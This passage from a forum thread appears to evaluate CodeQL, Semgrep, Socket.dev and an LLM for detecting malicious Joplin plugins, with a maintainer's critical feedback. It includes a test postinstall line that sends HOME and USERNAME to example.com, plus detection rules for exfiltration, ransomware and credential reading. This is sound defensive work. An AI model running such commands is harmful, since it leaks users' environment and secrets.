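console.log(readsNotesAndCallsNetwork(wrappedFlow)); // true
console.log(readsNotesAndCallsNetwork(networkOnly)); // false
```

The trade-off is visible here: the check no longer depends on tracking the data, but it also fires on a function that reads notes and makes an unrelated request, which is why the result still goes to a human reviewer.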

Though these rules solve the problem for now, I am sure there are still many blind spots left in CodeQL.
Additionally, CodeQL also caught these extra things:

| Threat / Finding | What it is |
| --- | --- |
| Weak Cryptography (CBC mode) | The code uses an outdated encryption algorithm mode (like AES-CBC) instead of modern authenticated encryption (like AES-GCM). |
| Insecure Network Traffic (HTTP) | The plugin is making network requests (fetching data or sending user info) over plain http:// rather than secure https://. |
| ReDoS (Inefficient Regex) | Regular Expression Denial of Service. The code contains a poorly structured regex pattern that requires exponential time to evaluate certain complex strings. |

All of these were code quality noise.

Additional test for Semgrep :

Ran Semgrep on the same test file:

| Rule ID / Finding | Description / Threat |
| --- | --- |
| eval-detected | Detected the use of eval(). Potential code injection vulnerability. |
| joplin-plugin-dynamic-code-execution | Remote or dynamically-loaded data flows into dynamic code execution (RCE). |
| joplin-plugin-master-password-access | MANUAL REVIEW REQUIRED: Plugin reads the master encryption password. |
| joplin-plugin-sync-cache-access | MANUAL REVIEW REQUIRED: Plugin reads the sync info cache (encryption keys/sync metadata). |
| joplin-plugin-secret-key-theft | Sensitive Joplin credentials flowing to a network/file/process/IPC sink. |
| joplin-plugin-unauthorized-fs-write | A path derived from __dirname flows to a file write (Self-modification). |
| joplin-plugin-network-backdoor | A server created via createServer() flows to .listen() (Network port opened). |
| joplin-plugin-clipboard-hijacking | Data flows into clipboard.writeText() (Clipboard hijacking). |
| joplin-plugin-command-execution | Data flows into shell command execution. Requires review. |
| joplin-plugin-cryptojacking | A string matching known miners/mining pools flows into child_process (Cryptojacking). |
| joplin-plugin-command-execution | Data flows into shell command execution. Requires review. |
| joplin-plugin-data-exfiltration | Joplin note data read via joplin.data.get() flows to a network request. |
| javascript.crypto.weak-symmetric-mode | Detected the use of a weak cryptographic mode (aes-256-cbc). |
| javascript.crypto.symmetric-hardcoded-key | A secret is hard-coded in the application. |
| joplin-plugin-ransomware | Ransomware pattern: reads notes, encrypts them, and writes them back. |
| joplin-plugin-ransomware-taint | Encrypted data flows into joplin.data.put(). |
| joplin-plugin-backup-hijacking | Network or file write detected inside a registerExportModule() callback. |
| joplin-plugin-remote-webview | An external URL flows into a Joplin webview via setHtml(). |

Semgrep caught everything.
How? : The rules written for it were mostly neither dynamic nor flow-tracking. Most of them were direct matches, like "if you see eval, report it", because Semgrep is an AST-matching scanner. Since the file was written specifically for testing, it caught everything useful. But using the same ruleset on a normal plugin produces a huge amount of noise. For example, running the Semgrep rules on Jarvis :

File | Lines | What the code is actually doing
src/chatPanel.ts | 94 | Building the HTML for the main Jarvis chat input UI (<div class="jarvis-chat-panel">).
src/commands/ask.ts | 30, 97, 127 | Building HTML forms for the "Ask Jarvis" and "Edit with Jarvis" popup dialogs.
src/commands/research.ts | 52 | Building the HTML form for the "Research with Jarvis" dialog.
src/models/models.ts | 1317 | Injecting local CSS styles (<style>) for a preview window.
src/ux/modelManagement.ts | 435 | Calling a helper function build_dialog_html to render the model management UI.
src/ux/panel.ts | 27, 51, 91 | Building the HTML for the sidebar panels (showing related notes, search boxes, and progress bars).

All of these are noise.
Running the new CodeQL rules on Jarvis in the same way produced no noise.

Conclusion :

Since the threat model is now mostly about data flow, AST-based scanners such as Semgrep and SonarQube (primarily a code quality scanner) cannot cover it. Even if complex custom rules are written, the main trade-off is that the tools would be doing something they were not designed for. A large blind spot will always remain for scenarios that were not considered while writing the rules, and the rules will also produce a lot of noise on normal plugins.

The tool that stood a chance was CodeQL. After several tests I came to the same conclusion as for the tools above: even though it supports taint tracking, there will always be blind spots for scenarios that were not considered while writing the rules.

The LLM performed well in all of these cases. Not only was it accurate at scanning, it also occasionally warned me about new things in the plugins that are potential issues.
I still believe an LLM would be a good fit for this pipeline.


SCA TOOL (socket.dev) :

Snyk, Semgrep SCA and npm audit are general CVE database scanners. For this pipeline we need something that can actually check whether a package is malicious.
The popular tool for this use case is Socket.dev.

The first thing I did was run a Socket scan on the top 10 plugins from the Joplin plugin website.
Why? : To determine the noise level. Also, I had previously tested Socket.dev with custom malicious postinstall scripts etc., but it did not give any results because it only works on packages officially published to npm.

One thing to keep in mind while viewing these results is that Socket.dev has three tiers: low, warn and critical. I have completely filtered out the low findings.

Here are the results for the top 10 plugins :

1. joplin-inline-tags-plugin :

Package | Version | Alert Type | Severity (Policy)
fast-xml-parser | 4.2.5 | criticalCVE | warn
form-data | 2.3.3 | criticalCVE | warn
form-data | 2.5.1 | criticalCVE | warn
form-data | 4.0.0 | criticalCVE | warn
entities | 4.5.0 | obfuscatedFile | warn
immer | 7.0.15 | criticalCVE | warn

2. joplin-inline-todo :

Package | Version | Alert Type | Severity (Policy)
entities | 4.5.0 | obfuscatedFile | warn
handlebars | 4.7.8 | criticalCVE | warn

3. joplin-math-mode :

Package | Version | Alert Type | Severity (Policy)
- | - | No alerts detected | -

The scan completed successfully and detected 0 alerts. The alerts object is entirely empty.

4. joplin-plugin-combine-notes :

Package | Version | Alert Type | Severity (Policy)
form-data | 2.3.3 | criticalCVE | warn
form-data | 4.0.0 | criticalCVE | warn
form-data | 2.5.1 | criticalCVE | warn
entities | 4.5.0 | obfuscatedFile | warn
immer | 7.0.15 | criticalCVE | warn

5. joplin-plugin-diff-tool :

Package | Version | Alert Type | Severity (Policy)
entities | 4.5.0 | obfuscatedFile | warn

6. joplin-plugin-extra-editor-settings :

Package | Version | Alert Type | Severity (Policy)
entities | 4.5.0 | obfuscatedFile | warn
form-data | 4.0.1 | criticalCVE | warn

7. joplin-plugin-jarvis :

Package | Version | Alert Type | Severity (Policy)
entities | 4.5.0 | obfuscatedFile | warn
markdown-it | 14.2.0 | obfuscatedFile | warn
markdown-it | 14.2.0 | obfuscatedFile | warn

8. plugin-templates :

Package | Version | Alert Type | Severity (Policy)
handlebars | 4.7.8 | criticalCVE | warn

9. plugin-yesyoukan :

Package | Version | Alert Type | Severity (Policy)
entities | 4.5.0 | obfuscatedFile | warn

10. joplin-plugin-quick-links :

Package | Version | Alert Type | Severity (Policy)
fast-xml-parser | 4.2.5 | criticalCVE | warn
form-data | 2.3.3 | criticalCVE | warn
form-data | 4.0.0 | criticalCVE | warn
form-data | 2.5.1 | criticalCVE | warn
entities | 4.5.0 | obfuscatedFile | warn
immer | 7.0.15 | criticalCVE | warn

Observation :

None of the results were useful. Every alert generated was a false positive for this threat model.

entities : obfuscatedFile - Appeared in 8/10 plugins. The flagged file is a machine-generated HTML character decoding lookup table. Socket.dev cannot distinguish between intentionally obfuscated malware and auto-generated data tables.

form-data : criticalCVE - Appeared in 4/10 plugins in the tables above. It is a dependency pulled in through @joplin/* packages.
Is there a way to silence it? : The only options are to silence, one by one, every package that can be pulled in (not feasible), or to add CVE and obfuscatedFile to the ignore list, but then we would lose useful information too (not feasible).

markdown-it : obfuscatedFile - Flagged only in Jarvis. These are standard minified browser bundles. False positive.

immer, fast-xml-parser, handlebars : criticalCVE - Known CVEs in older versions of these packages. They are not Joplin-specific and fall in the warn category. This is not something we are looking for, nor does it help us, and a few of them also come from @joplin/*.

Summary

Plugin | Alerts | Real Threats | False Positives
joplin-inline-tags-plugin | 6 | 0 | 6
joplin-inline-todo | 2 | 0 | 2
joplin-math-mode | 0 | 0 | 0
joplin-plugin-combine-notes | 5 | 0 | 5
joplin-plugin-diff-tool | 1 | 0 | 1
joplin-plugin-extra-editor-settings | 2 | 0 | 2
joplin-plugin-jarvis | 3 | 0 | 3
plugin-templates | 1 | 0 | 1
plugin-yesyoukan | 1 | 0 | 1
joplin-plugin-quick-links | 6 | 0 | 6
Total | 27 | 0 | 27
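
For anyone who wants to reproduce the tally, here is a minimal sketch of how the per-plugin counts can be derived once the low tier is filtered out. The Alert shape and its field names are assumptions made for this example, not Socket.dev's actual report schema. The rows are copied from three of the tables above.

```typescript
// Assumed shape of one alert row; NOT Socket.dev's real JSON schema.
type Severity = "low" | "warn" | "critical";

interface Alert {
  pkg: string;
  version: string;
  type: string;
  severity: Severity;
}

interface PluginScan {
  plugin: string;
  alerts: Alert[];
}

// Rows copied from three of the per-plugin tables above.
const scans: PluginScan[] = [
  {
    plugin: "joplin-inline-todo",
    alerts: [
      { pkg: "entities", version: "4.5.0", type: "obfuscatedFile", severity: "warn" },
      { pkg: "handlebars", version: "4.7.8", type: "criticalCVE", severity: "warn" },
    ],
  },
  { plugin: "joplin-math-mode", alerts: [] },
  {
    plugin: "joplin-plugin-jarvis",
    alerts: [
      { pkg: "entities", version: "4.5.0", type: "obfuscatedFile", severity: "warn" },
      { pkg: "markdown-it", version: "14.2.0", type: "obfuscatedFile", severity: "warn" },
      { pkg: "markdown-it", version: "14.2.0", type: "obfuscatedFile", severity: "warn" },
    ],
  },
];

// Drop the low tier, then count what is left for each plugin.
function countAlerts(input: PluginScan[]): Map<string, number> {
  const counts = new Map<string, number>();
  for (const scan of input) {
    const kept = scan.alerts.filter((a) => a.severity !== "low");
    counts.set(scan.plugin, kept.length);
  }
  return counts;
}

const alertCounts = countAlerts(scans);
```

For these three plugins the counts come out as 2, 0 and 3, matching the Alerts column of the summary table.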

Then I ran the test again on Jarvis with a new custom dependency :

"akshajrawat.utils": "^1.0.1",

that contained :

 "postinstall": "node -e \"require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)\""

No new results were found.

Conclusion :

Every single alert across all 10 plugins is either a CVE in a trusted Joplin dependency or a false positive obfuscation flag on generated/minified files. A maintainer reading these reports would find zero actionable information.

Socket.dev has no @joplin/* filter and surfaces the same Joplin-owned CVEs on every plugin.

As shown in the proposal test, a purpose-built malicious postinstall script was completely missed, and the older tests showed the same result: these custom packages were missed.

What we can do :
Do not integrate Socket.dev. The LLM SCA summary (install scripts + non-registry sources + direct dependency typosquatting check) covers the actual threat surface more accurately with significantly less noise :

1. Flag: Install Scripts Detected (postinstall, preinstall)

  • The Threat: The plugin or a dependency is trying to execute terminal commands on the user's machine the moment it is downloaded.

  • The Reviewer's Action: Hard Reject.
In Joplin, there is almost zero reason for a plugin to run shell commands during installation.

2. Flag: Non-Registry Sources (Git URLs)

  • The Threat: The package.json points to a URL like github:someuser/somerepo or an HTTP link instead of an official npm version.

  • The Reviewer's Action: Block & Demand Migration.
The reviewer can refuse to approve the plugin because a non-registry source breaks the security scanner's ability to track the dependency.

3. Flag: Direct Dependency Typosquatting

If there is a typosquatted package, the plugin should be rejected immediately.
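
The three flags above can be sketched as a deterministic pre-check on a single package.json. This is a rough illustration under stated assumptions, not the LLM summary itself. KNOWN_NAMES is a hypothetical placeholder list, the edit-distance threshold of 2 is arbitrary and will misfire on short names, and the sample package is invented. To cover install scripts in dependencies as well, the same function would have to be run on each dependency's own package.json.

```typescript
// Minimal slice of package.json used by this sketch.
interface PackageJson {
  scripts?: Record<string, string>;
  dependencies?: Record<string, string>;
}

type FlagKind = "install-script" | "non-registry-source" | "possible-typosquat";

interface ScaFlag {
  kind: FlagKind;
  detail: string;
}

// npm lifecycle hooks that run automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Dependency specifiers that point outside the npm registry.
const NON_REGISTRY_PREFIX = /^(git\+|git:|github:|gitlab:|bitbucket:|https?:|file:)/;
// Bare "user/repo" is npm shorthand for a GitHub repository.
const GITHUB_SHORTHAND = /^[\w.-]+\/[\w.-]+(#.+)?$/;
// Hypothetical placeholder; a real check needs a proper list of popular packages.
const KNOWN_NAMES = ["lodash", "express", "axios", "markdown-it", "fs-extra"];

// Classic Levenshtein distance, computed row by row.
function editDistance(a: string, b: string): number {
  let prev: number[] = [];
  for (let j = 0; j <= b.length; j++) prev.push(j);
  for (let i = 1; i <= a.length; i++) {
    const curr: number[] = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a.charAt(i - 1) === b.charAt(j - 1) ? 0 : 1;
      curr.push(Math.min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + cost));
    }
    prev = curr;
  }
  return prev[b.length];
}

function checkPackage(pkg: PackageJson): ScaFlag[] {
  const flags: ScaFlag[] = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook] !== undefined) {
      flags.push({ kind: "install-script", detail: hook + ": " + scripts[hook] });
    }
  }
  const deps = pkg.dependencies || {};
  for (const depName of Object.keys(deps)) {
    const spec = deps[depName];
    if (NON_REGISTRY_PREFIX.test(spec) || GITHUB_SHORTHAND.test(spec)) {
      flags.push({ kind: "non-registry-source", detail: depName + " -> " + spec });
    }
    if (KNOWN_NAMES.indexOf(depName) !== -1) continue; // exact match is fine
    for (const known of KNOWN_NAMES) {
      if (editDistance(depName, known) <= 2) {
        flags.push({ kind: "possible-typosquat", detail: depName + " looks like " + known });
        break;
      }
    }
  }
  return flags;
}

// Invented sample: one install hook, one misspelled name, one Git source.
const samplePackage: PackageJson = {
  scripts: { postinstall: "node collect.js" },
  dependencies: {
    axois: "^1.0.0",
    helper: "github:someuser/somerepo",
    lodash: "^4.17.21",
  },
};
const sampleFlags = checkPackage(samplePackage);
```

On the sample, the check raises one flag of each kind and leaves lodash alone. A result like this could be handed to the reviewer or to the LLM as structured input.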

was flagged by all three tools. It uses joplin.require('sqlite3') and joplin.require('fs-extra') to load high-privilege Node modules, bypassing the plugin sandbox entirely.

joplin.require is part of the plugin API and certainly not something that "bypasses the plugin sandbox entirely". And by the way Jarvis is not a malicious plugin.

And since your two findings are apparently about joplin.require it means the analysis unfortunately doesn't have much value. I stopped reading there.

I feel you're not taking this seriously and maybe underestimating how important it is.

Among the things you'll do during this project, coding is not the most important part. The coding part is trivial since it can be done in 30 min by an AI.

Where you can bring value is by researching the problem in depth, testing, understanding the plugin API, the security tools, etc. It takes time - several days, but this would be valuable for the open source project. And in fact it would be for you too - companies value people who can produce quality data and reports that can be used to inform business and technical decisions.

So I'm not seeing any serious attempt at it so far. I hope you can reconsider and do it properly but I'm not going to insist on that part if you don't want to do it.

Thanks for the reply and feedback. I was still running a few more tests, and I'll keep this feedback in mind.

To clarify the intent behind flagging joplin.require(): it was never meant to label a plugin as malicious. The idea was to show it as a signal for the human reviewer: "this plugin is accessing the database or filesystem via joplin.require(), here is exactly which file and line, please check that it is not doing something malicious."
The severity in the YAML was set to error during testing, which made it appear as a hard result, and that is why Jarvis was shown as malicious.

Sorry, I am a bit confused.
Since human review is mandatory in the workflow, my focus was to generate a report that contains both "this is wrong, review needed" and "this might be wrong, so please review it".

Using the default rules provided by the tools is useless here: every time I ran a test without custom rules, it did not give any useful outcome. So the threat model will be the final source of truth about what to flag :

These are "this is wrong, review needed" :

  • child_process()
  • eval(), Function(), vm.runInContext()
  • process.env access
  • Direct fs access to hardcoded paths like .config/joplin-desktop or database.sqlite
  • net.createServer()

These are "this might be wrong" :

  • joplin.data.get(['notes']) followed by network I/O
  • crypto.createCipheriv() overwriting note content
  • joplin.require() - plugin touching the database or filesystem
  • joplin.interop.registerExportModule
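
To make the two tiers concrete, here is a small sketch of how each rule could carry its tier, so that a "might be wrong" hit is reported as a note for the reviewer instead of a hard error. The regexes are a crude stand-in for the real Semgrep/CodeQL rules, and every rule id and tier name here is made up for illustration. Only some of the list entries are covered.

```typescript
type Tier = "review-needed" | "might-be-wrong";

interface Rule {
  id: string; // illustrative id, not a real Semgrep/CodeQL rule id
  tier: Tier;
  pattern: RegExp; // line-level stand-in for a real rule
}

interface Finding {
  file: string;
  line: number;
  ruleId: string;
  tier: Tier;
}

const RULES: Rule[] = [
  { id: "child-process", tier: "review-needed", pattern: /\bchild_process\b/ },
  {
    id: "dynamic-code",
    tier: "review-needed",
    pattern: /\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.runInContext\s*\(/,
  },
  { id: "process-env", tier: "review-needed", pattern: /\bprocess\.env\b/ },
  { id: "net-server", tier: "review-needed", pattern: /\bnet\.createServer\s*\(/ },
  { id: "joplin-require", tier: "might-be-wrong", pattern: /\bjoplin\.require\s*\(/ },
  { id: "export-module", tier: "might-be-wrong", pattern: /\bregisterExportModule\s*\(/ },
];

// Report file, line and tier for every rule that matches a source line.
function scanSource(file: string, source: string): Finding[] {
  const findings: Finding[] = [];
  const lines = source.split("\n");
  for (let i = 0; i < lines.length; i++) {
    for (const rule of RULES) {
      if (rule.pattern.test(lines[i])) {
        findings.push({ file, line: i + 1, ruleId: rule.id, tier: rule.tier });
      }
    }
  }
  return findings;
}

// Hypothetical two-line plugin source.
const demoSource = [
  "const fs = joplin.require('fs-extra');",
  "console.log(process.env.HOME);",
].join("\n");
const demoFindings = scanSource("src/index.ts", demoSource);
```

On the two-line sample this gives a "might-be-wrong" finding on line 1 and a "review-needed" finding on line 2, each with the file and line the reviewer should open.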

I have also verified them directly by writing test plugins and confirming the results in Joplin.

The process.env finding is particularly significant: the screenshot shows a full map of the development environment, including Git, Docker, Python, Node, Go, Rust, MySQL, CodeQL and VS Code paths, all readable by any installed plugin with no user prompt or permission required.

The joplin.require('fs-extra') test read sensitive files, including .gitconfig (name, email) and authentication credentials from .npmrc, and gave access to the authentication token :

Is this the wrong approach? Should I be looking for something else?
I will try to research the tools and the plugin API more.

I've updated the top post with a better study. I will be doing more tests and will update the post and threat model accordingly.

I believe the older threat model was not well defined, as you mentioned :

So instead of defining what to flag, I changed many rules to the exact flow that should be flagged, like :
GET notes -> POST request using fetch() or axios
joplin.require('fs-extra') -> used to read sensitive OS folders etc
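
The difference between "flag the call" and "flag the flow" can be shown with a toy taint tracker over a simplified statement list. This is only a sketch of the idea, not how CodeQL works internally. The Stmt shape, the rule id, and the names renderList and updateUrl are invented for the example.

```typescript
// One simplified statement: `target = call(args...)`; target is absent for bare calls.
interface Stmt {
  line: number;
  call: string;
  args: string[];
  target?: string;
}

interface FlowRule {
  id: string;
  sources: string[]; // calls whose result is considered sensitive
  sinks: string[]; // calls that must not receive sensitive data
}

interface FlowFinding {
  rule: string;
  sourceLine: number;
  sinkLine: number;
}

function findFlows(stmts: Stmt[], rule: FlowRule): FlowFinding[] {
  // Variable name -> line where its tainted value originated.
  const tainted = new Map<string, number>();
  const findings: FlowFinding[] = [];
  for (const s of stmts) {
    // Origin line of the first tainted argument, if any.
    let taintLine: number | undefined;
    for (const arg of s.args) {
      const line = tainted.get(arg);
      if (line !== undefined && taintLine === undefined) taintLine = line;
    }
    if (taintLine !== undefined && rule.sinks.indexOf(s.call) !== -1) {
      findings.push({ rule: rule.id, sourceLine: taintLine, sinkLine: s.line });
    }
    if (s.target !== undefined) {
      if (rule.sources.indexOf(s.call) !== -1) tainted.set(s.target, s.line);
      else if (taintLine !== undefined) tainted.set(s.target, taintLine);
      else tainted.delete(s.target); // overwritten with clean data
    }
  }
  return findings;
}

const notesToNetwork: FlowRule = {
  id: "notes-to-network",
  sources: ["joplin.data.get"],
  sinks: ["fetch", "axios.post"],
};

// Notes are read, serialized and sent out: the rule should fire.
const exfilPlugin: Stmt[] = [
  { line: 1, target: "notes", call: "joplin.data.get", args: [] },
  { line: 2, target: "body", call: "JSON.stringify", args: ["notes"] },
  { line: 3, call: "fetch", args: ["url", "body"] },
];

// Notes are only rendered locally; the fetch() is unrelated to them.
const benignPlugin: Stmt[] = [
  { line: 1, target: "notes", call: "joplin.data.get", args: [] },
  { line: 2, target: "html", call: "renderList", args: ["notes"] },
  { line: 3, call: "panels.setHtml", args: ["panel", "html"] },
  { line: 4, call: "fetch", args: ["updateUrl"] },
];

const exfilFlows = findFlows(exfilPlugin, notesToNetwork);
const benignFlows = findFlows(benignPlugin, notesToNetwork);
```

The first plugin yields one finding (source on line 1, sink on line 3). The second yields none, even though it calls both joplin.data.get and fetch(), which is the kind of case where a plain "notes read + network call" pattern would produce noise.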

I think this updated threat model should satisfy what you actually want to see in a result.

Is this a good approach?

I have also opened a PR for phase 1 of the publish workflow so that we don't run short on time: "All: Resolves #15595: Added local validations for new publish workflow for plugin ecosystem" by akshajrawat · Pull Request #15596 · laurent22/joplin · GitHub.
Please review it whenever you get time. Thanks.

Thank you for the updated analysis, this is much better than the earlier one.

Regarding settings.globalValue(), that's indeed a finding that we need to fix separately. You can leave it out for now.

In your data, CodeQL seems about as good as LLM once the rules are written, and of course CodeQL is better in terms of costs and also more deterministic.

Could you please create a new report (you can post an answer here) that focuses on CodeQL and Gemini only?

You mentioned in particular that there's a "huge Zero-Day Blind Spot" for CodeQL and you imply it would be found by the LLM, but you didn't demonstrate it. To actually test this: design one or two attack patterns that aren't in your threat model categories, then run both tools against them. If the LLM catches what CodeQL misses, that's evidence we can work with.

And ideally the rules should be tight enough anyway that it is not possible to go around them (it will probably be a bit of a cat and mouse game).

Regarding XSS, I said "most likely not for XSS either", because many generic CVEs are going to flag things that are mostly relevant to websites, not Electron apps. But some XSS will be relevant to us. I'm a bit concerned that you turned off all XSS rules based on an earlier vague comment without discussing it or considering the impact on your project. Please list which categories of XSS rules are relevant to a Joplin plugin and which aren't.